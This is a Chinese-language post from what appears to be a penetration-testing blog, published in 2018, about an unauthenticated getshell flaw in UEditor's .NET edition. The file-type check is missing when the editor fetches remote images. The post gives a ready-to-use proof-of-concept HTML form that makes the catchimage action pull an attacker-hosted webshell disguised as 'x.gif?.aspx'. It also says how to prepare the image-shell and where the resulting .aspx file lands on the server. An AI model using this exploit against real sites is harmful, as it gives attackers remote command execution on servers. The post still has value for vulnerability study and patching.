UEditor .net 前台getshell

administrator

发表文章数:115

首页 » Web安全 » UEditor .net 前台getshell

UEditor
是一款所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点,被广大WEB应用程序所使用。本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危
0x01:
版本:1.4.3.3、 1.5.0(只测试这两个版本)
0x02:
UEditor .net 前台getshell
如下图所示,只要出现如下结果,即有可能漏洞存在
UEditor .net 前台getshell
0x03
POC:

<form action="https://x.x.x.x/Content/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">

  <p>shell address:<input type="text" name="source[]" value="http://x.x.x.x/Content/x.gif?.aspx"/></p >

  <input type="submit" value="Submit" />

</form>

0x04:
需准备一个图片马儿,远程shell地址需要指定扩展名为 1.gif?.aspx
0x05:
shell地址如下:
http://x.x.x.x.x/Content/ueditor/net//upload/image/20180823/6367065672506096633557644.aspx

免责声明:本站所提供工具、技术文章,仅供技术学习交流、请勿用于非法行为,请遵守相关法律规定,否则后果自负。作者:administrator, 转载或复制请以 超链接形式 并注明出处 大老李的Blog|渗透测试论坛|红蓝对抗|大型Web安全问答社区
原文地址:《UEditor .net 前台getshell》 发布于2018-08-24

分享到:
赞(0) 打赏 生成海报

评论 抢沙发

评论前必须登录!

  注册



长按图片转发给朋友

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

关于渗透测试入门到进阶教学
后期的系列课程、问答以及工具、思路分享将会在星球发布
切换注册

登录

忘记密码 ?

切换登录

注册